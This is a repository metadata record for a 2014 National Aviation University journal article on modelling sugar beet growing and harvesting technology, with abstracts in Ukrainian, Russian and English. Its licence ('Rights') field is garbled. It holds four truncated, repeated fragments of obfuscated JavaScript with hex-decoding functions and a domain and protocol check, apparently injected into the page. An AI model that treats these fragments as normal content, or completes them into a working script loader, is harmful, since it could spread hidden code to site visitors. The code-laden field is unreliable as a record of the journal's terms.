Record Details

Моделювання технології виробництва цукрового буряку

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Моделювання технології виробництва цукрового буряку
Моделирование технологии производства сахарной свеклы
SIMULATION TECHNOLOGY OF SUGAR BEET
 
Creator Volokha, Mykola; National Aviation University
Boldyrieva, Larisa; National Aviation University
 
Subject
коренеплід; моделювання; технічний засіб; технологічний процес; цукровий буряк
633.63:631.35

корнеплод; моделирование; сахарная свекла; технологический процесс; техническое средство
633.63:631.35

modelling; root; sugar beet; technical means; technological process
633.63:631.35
 
Description Технологія виробництва коренеплодів цукрових буряків є поєднання агротехнічних прийомів і технічнихзасобів, покликаних їх виконувати. Моделі таких технологічних процесів пропонується розглядати як складнісистеми, які характеризуються великою кількістю взаємопов’язаних між собою підсистем та елементів,різноманітністю вимог до окремих ланок технологічного процесу, випадковим характером, інваріантністюструктури, неоднорідність фізичної природи і т.п. Тому моделювання таких технологічних процесів повиннобазуватися на певному наборі принципів, що забезпечує методику побудови моделей шляхом уніфікаціїпроцедур моделювання, класифікації критеріїв оцінювання та узагальнення технологічних змінних, колиосновними принципами моделювання технології вирощування і збирання цукрових буряків визначаються:– доцільність моделювання;– наявність достатньої інформації;– множинність;– агрегативність;– координованість.
Технология производства корнеплодов сахарной свеклы объединяет несколько агротехнических приемов итехнических средств, которые нужны для их работы. Модели таких технологических процессов предлагаетсярассмотреть как сложные системы, которые характеризируются большим количеством взаимосвязанных междусобою подсистем та элементов, разнообразием требований к отдельным звеньям технологического процесса,случайным характером,, инвариантностью структуры, неоднородностью физической природы и т.п. Поэтомумоделирование таких технологических процессов должно базироваться на определенном наборе принципов,что в свою очередь дает возможность методике построения моделей путем унификации процедурмоделирования, класификации критериев оценивания и обьединения технологических значений, кордаосновними принципами моделирования технологи выращивания и сборки сахарной свеклы определяются :– оптимальность моделирования;– наявность нужной информации;– агрегативность;– множественность;– координованость.
The Article highlights specific features of process simulation and technical facilities related to sugar beetproduction. It reviews the literature sources and specifies distinctive properties of the created models . Basing upon theanalysis conducted the main principles of process simulation of sugar beet growing and cropping are proposed.
 
Publisher National Aviation University
 
Contributor


 
Date 2014-12-15
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/7604
10.18372/2306-1472.61.7604
 
Source Proceedings of the National Aviation University; Том 61, № 4 (2014); 133-139
Вестник Национального авиационного университета; Том 61, № 4 (2014); 133-139
Вісник Національного Авіаційного Університету; Том 61, № 4 (2014); 133-139
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ